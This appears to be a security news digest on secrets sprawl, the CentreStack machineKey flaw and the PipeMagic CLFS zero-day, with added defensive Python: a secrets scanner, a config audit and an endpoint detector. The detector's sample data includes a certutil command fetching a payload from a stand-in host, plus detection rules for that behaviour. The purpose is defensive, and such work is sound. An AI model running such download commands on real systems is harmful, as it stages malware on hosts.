1-Explosive Non-Human Identity Growth Making Massive Security Gaps
GitGuardian's State of Secrets Sprawl report for 2025 exposes the concerning extent of secrets leaked in contemporary software systems. Driving this is the rapid expansion of non-human identities (NHIs), which have outnumbered human users for years. As these machine identities proliferate, creating security risk on a scale not seen before, we must get ahead of it and put security mechanisms and governance for machine identities in place.
The report found 23.77 million new secrets disclosed on GitHub in 2024 alone, a 25% increase over the previous year. This sharp rise shows how quickly the explosion of non-human identities (NHIs), including service accounts, microservices and artificial intelligence agents, is expanding the attack surface available to threat actors.
NHI secrets such as API keys, service accounts and Kubernetes workers now outnumber human identities in DevOps environments by at least 45 to 1. Modern infrastructure depends on these machine credentials, yet when they are handled improperly they pose major security risks.
Most worrisome is the persistence of exposed credentials: according to GitGuardian's research, 70% of the secrets first discovered in public repositories back in 2022 are still valid today, which points to a systematic failure in credential rotation and management practices.
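The two failure modes above (secrets committed to source, and secrets never rotated once found) are what a basic secrets-hygiene check looks for. The following Python is an added example written for this digest, not GitGuardian's scanner or any code from the report: a small rule-based scanner over source text that reports redacted findings, plus a rotation-age check over a credential inventory. The sample source lines, the inventory and the REPORT_DATE are constructed; the AWS value is AWS's own documented example key and the GitHub token suffix is made up.

```python
import re
from dataclasses import dataclass
from datetime import date

# Detection rules. The AWS access-key and GitHub token shapes are publicly
# documented formats; the generic rule catches a quoted literal assigned to a
# credential-looking name (api_key, secret, token, password).
RULES = [
    ("aws_access_key_id", re.compile(r"\b(AKIA[0-9A-Z]{16})\b")),
    ("github_pat", re.compile(r"\b(ghp_[A-Za-z0-9]{36})\b")),
    ("generic_assignment", re.compile(
        r"(?i)\b(?:api[_-]?key|secret|token|password|passwd)\b\s*[:=]\s*['\"]([^'\"]{8,})['\"]"
    )),
]


@dataclass
class Finding:
    rule: str
    line_no: int
    redacted: str  # never carry the full secret into reports or logs


def redact(value: str) -> str:
    """Keep just enough of the value to locate it without re-exposing it."""
    return value[:4] + "..." + value[-4:] if len(value) > 8 else "****"


def scan_for_secrets(text: str) -> list[Finding]:
    """Scan source text line by line and return every rule match, redacted."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for name, rx in RULES:
            for m in rx.finditer(line):
                findings.append(Finding(name, line_no, redact(m.group(1))))
    return findings


def rotation_overdue(inventory, today: date, max_age_days: int = 90) -> list[str]:
    """Return ids of secrets whose last rotation is older than the policy window.

    inventory: iterable of (secret_id, last_rotated_date). A secret first seen in
    a public repository years ago and still listed here unrotated is exactly the
    failure mode the report describes."""
    return [sid for sid, last_rotated in inventory
            if (today - last_rotated).days > max_age_days]


# Constructed sample input (not real credentials): the AWS value is AWS's own
# documented example key, the GitHub value has a made-up 36-character suffix.
# Line 5 reads the password from the environment and must NOT be flagged.
SAMPLE_SOURCE = """\
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
GITHUB_TOKEN = "ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
password = "hunter2hunter2"
api_key: 'sk-constructed-example-1234'
password = os.environ["DB_PASSWORD"]
timeout = 30
"""

# Constructed inventory: (secret id, date last rotated), and a constructed audit date.
INVENTORY = [
    ("svc-deploy-key", date(2022, 6, 1)),    # found in 2022, never rotated since
    ("ci-runner-token", date(2025, 3, 15)),
]
REPORT_DATE = date(2025, 4, 10)

if __name__ == "__main__":
    for f in scan_for_secrets(SAMPLE_SOURCE):
        print(f"line {f.line_no}: {f.rule} -> {f.redacted}")
    print("rotation overdue:", rotation_overdue(INVENTORY, REPORT_DATE))
```

The generic rule deliberately requires a quoted literal, so code that pulls a credential from the environment or a vault passes; the point of the redaction helper is that the scanner's own output must not become a second copy of the leak.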
2-CISA Notes Hard-Coded MachineKey Vulnerability Enabling RCE Attacks in CentreStack
Citing evidence of active exploitation in the wild, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a severe security flaw affecting Gladinet CentreStack to its Known Exploited Vulnerabilities (KEV) catalog.
Tracked as CVE-2025-30406 (CVSS score: 9.0), the vulnerability concerns a hard-coded cryptographic key that, if abused, can be used to achieve remote code execution. It was fixed in version 16.4.10315.56EA, released on April 3, 2025.
"Gladinet CentreStack uses hard-coded cryptographic key vulnerability in the manner the application manages keys used for ViewState integrity verification," CISA warned. "Effective exploitation lets an attacker create ViewState payloads for server-side deserialization, so enabling remote code execution."
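The weakness CISA describes is a deployment-configuration problem: the ASP.NET machineKey that protects ViewState integrity is only as secret as its handling. The following Python is an added example for this digest, not Gladinet's code or CISA's guidance: a web.config audit that flags a static validationKey/decryptionKey (which must then be treated as a per-deployment secret), a key already known to be shared across installs, a disabled ViewState MAC, and weak algorithms. Both sample configs and the PLACEHOLDER_KEY are constructed and bear no relation to any real product's key.

```python
import xml.etree.ElementTree as ET

# Algorithms that should not appear on a current ASP.NET deployment.
WEAK_VALIDATION = {"MD5", "SHA1"}
WEAK_DECRYPTION = {"DES", "3DES"}


def audit_machine_key(config_xml: str, known_shared_keys=frozenset()) -> list[str]:
    """Return findings for the <machineKey> and <pages> settings in a web.config.

    known_shared_keys: key values an auditor has already seen in more than one
    installation (for instance, a value shipped inside an installer). Such a key
    is not a secret at all: anyone with a copy of the product has it."""
    root = ET.fromstring(config_xml)
    issues = []

    # ViewState MAC must stay enabled, otherwise the key question is moot.
    for pages in root.iter("pages"):
        if pages.get("enableViewStateMac", "true").lower() == "false":
            issues.append("enableViewStateMac=false: ViewState integrity check is disabled")

    for mk in root.iter("machineKey"):
        for attr in ("validationKey", "decryptionKey"):
            value = mk.get(attr, "AutoGenerate,IsolateApps")
            if value.upper().startswith("AUTOGENERATE"):
                continue  # runtime-generated per machine/app: nothing hard-coded
            if value in known_shared_keys:
                issues.append(f"{attr} matches a key known to be shared across installs")
            else:
                issues.append(f"{attr} is static in config: treat it as a secret, "
                              "keep it unique per deployment and rotate it")
        if mk.get("validation", "HMACSHA256").upper() in WEAK_VALIDATION:
            issues.append(f"weak validation algorithm {mk.get('validation')}")
        if mk.get("decryption", "Auto").upper() in WEAK_DECRYPTION:
            issues.append(f"weak decryption algorithm {mk.get('decryption')}")
    return issues


# Constructed configs with a placeholder key value (not from any real product).
PLACEHOLDER_KEY = "0123456789ABCDEF" * 4

BAD_CONFIG = f"""
<configuration>
  <system.web>
    <pages enableViewStateMac="false"/>
    <machineKey validationKey="{PLACEHOLDER_KEY}" decryptionKey="{PLACEHOLDER_KEY}"
                validation="SHA1" decryption="3DES"/>
  </system.web>
</configuration>
"""

GOOD_CONFIG = """
<configuration>
  <system.web>
    <machineKey validationKey="AutoGenerate,IsolateApps" decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" decryption="AES"/>
  </system.web>
</configuration>
"""

if __name__ == "__main__":
    for issue in audit_machine_key(BAD_CONFIG, known_shared_keys={PLACEHOLDER_KEY}):
        print("finding:", issue)
    print("good config findings:", audit_machine_key(GOOD_CONFIG))
```

A static key is legitimate for a web farm, where every node must validate the same ViewState, so the "static" finding is a prompt to confirm the key is unique to that deployment, stored like a credential and rotatable; a key that appears in more than one installation fails that test outright.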
3-PipeMagic Trojan Uses Windows Zero-Day Vulnerability to Release Ransomware
Microsoft has disclosed that a now-patched security flaw in the Windows Common Log File System (CLFS) was used in ransomware attacks against a small number of targets.
The IT behemoth said: "The targets include organizations in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia."
The vulnerability in question is CVE-2025-29824, a privilege escalation flaw in CLFS that can be exploited to obtain SYSTEM privileges. Redmond fixed it as part of its April 2025 Patch Tuesday release.
Microsoft is tracking the activity and the post-compromise exploitation of CVE-2025-29824 under the alias Storm-2460; the threat actors also use malware called PipeMagic to deliver both the exploit and the ransomware payloads.
4-PipeMagic Trojan and the Windows CLFS Zero-Day: Further Details
Microsoft stated that a now-patched Windows Common Log File System (CLFS) security flaw was exploited as a zero-day in ransomware attacks on a small number of targets.
"The targets include organizations in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia," the company claimed.
CVE-2025-29824, a CLFS privilege escalation flaw, can be used to gain SYSTEM privileges. Redmond fixed it in the April 2025 Patch Tuesday release.
Microsoft is tracking the post-compromise exploitation of CVE-2025-29824 under the name Storm-2460; the actor uses PipeMagic to deliver both the exploit and the ransomware payloads.
The attacks' initial access route is unknown. The actors have been seen using certutil to download malware from a legitimate third-party site that had been compromised to stage the payloads.
The malware is an MSBuild file carrying an encrypted payload that unpacks to execute PipeMagic, a plugin-based trojan first documented in 2022.
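Both delivery steps described above, certutil fetching a payload over HTTP and MSBuild launching a project file, involve signed Windows binaries doing something unusual, which is what endpoint detection keys on. The following Python is an added example for this digest, not Microsoft's detection logic: it classifies process-creation events (image path plus command line) and tags the two behaviours. The SAMPLE_EVENTS, hostnames and paths are constructed; the certutil and MSBuild switches used are the real ones.

```python
import ntpath
import re

# Constructed process-creation events (image path, command line): not real telemetry.
# Events 0 and 2 should be tagged; events 1 and 3 are benign use of the same tools.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\certutil.exe",
     r"certutil.exe -urlcache -split -f http://example.invalid/stage/update.bin C:\Users\Public\update.bin"),
    (r"C:\Windows\System32\certutil.exe",
     r"certutil.exe -verify C:\certs\server.cer"),
    (r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\build.csproj"),
    (r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     r"MSBuild.exe C:\src\app\app.csproj /t:Build"),
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Directories an unprivileged user can write to; a build project started from
# one of these is far more likely to be a dropped file than a developer's checkout.
USER_WRITABLE_RE = re.compile(r"\\(users|temp|programdata|windows\\temp)\\", re.IGNORECASE)
PROJECT_EXTS = (".csproj", ".proj", ".xml", ".targets")


def classify_event(image: str, cmdline: str) -> list[str]:
    """Return detection tags for one process-creation event (empty list = nothing)."""
    tags = []
    exe = ntpath.basename(image).lower()
    cl = cmdline.lower()
    # certutil's URL cache switch plus an http(s) URL on the command line is the
    # download-with-a-signed-binary pattern described in the article.
    if exe == "certutil.exe" and "urlcache" in cl and URL_RE.search(cl):
        tags.append("certutil_url_download")
    # MSBuild launched against a project file sitting in a user-writable directory.
    if exe == "msbuild.exe":
        for tok in cmdline.split():
            if tok.lower().endswith(PROJECT_EXTS) and USER_WRITABLE_RE.search(tok):
                tags.append("msbuild_project_in_user_writable_path")
                break
    return tags


def triage(events) -> list[tuple[int, list[str]]]:
    """Run the classifier over a batch and keep only the events that got a tag."""
    hits = []
    for idx, (image, cmdline) in enumerate(events):
        tags = classify_event(image, cmdline)
        if tags:
            hits.append((idx, tags))
    return hits


if __name__ == "__main__":
    for idx, tags in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {tags} <- {SAMPLE_EVENTS[idx][1]}")
```

Neither rule is proof of compromise on its own; certutil -urlcache has legitimate uses and developers do build from their home directories. The value is in correlation: a certutil download followed within minutes by MSBuild on a project file in %TEMP% on the same host is the sequence the article describes, and that pairing is what an analyst should alert on.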
CVE-2025-29824 is the second Windows zero-day delivered via PipeMagic, after CVE-2025-24983, a Windows Win32 Kernel Subsystem privilege escalation flaw that ESET flagged and Microsoft patched last month.
PipeMagic was also used in Nokoyawa ransomware operations that exploited another CLFS zero-day (CVE-2023-28252).
"In some of the other attacks that we attribute to the same actor, we also observed that, prior to exploiting the CLFS elevation-of-privilege vulnerability, the victim's machines were infected with a custom modular backdoor named 'PipeMagic' that gets launched via an MSBuild script," Kaspersky said in April 2023.
Notably, this exploit does not affect Windows 11, version 24H2, because access to certain System Information Classes in NtQuerySystemInformation there requires SeDebugPrivilege, which only admin-like users can hold.
"The exploit targets a CLFS kernel driver vulnerability," Microsoft Threat Intelligence said. "The exploit then utilizes a memory corruption and the RtlSetAllBits API to overwrite the exploit process's token with the value 0xFFFFFFFF, enabling all privileges for the process, which allows for process injection into SYSTEM processes."
References
https://thehackernews.com/2025/04/pipemagic-trojan-exploits-windows-clfs.html
https://thehackernews.com/2025/04/cisa-warns-of-centrestacks-hard-coded.html
https://thehackernews.com/2025/04/explosive-growth-of-non-human.html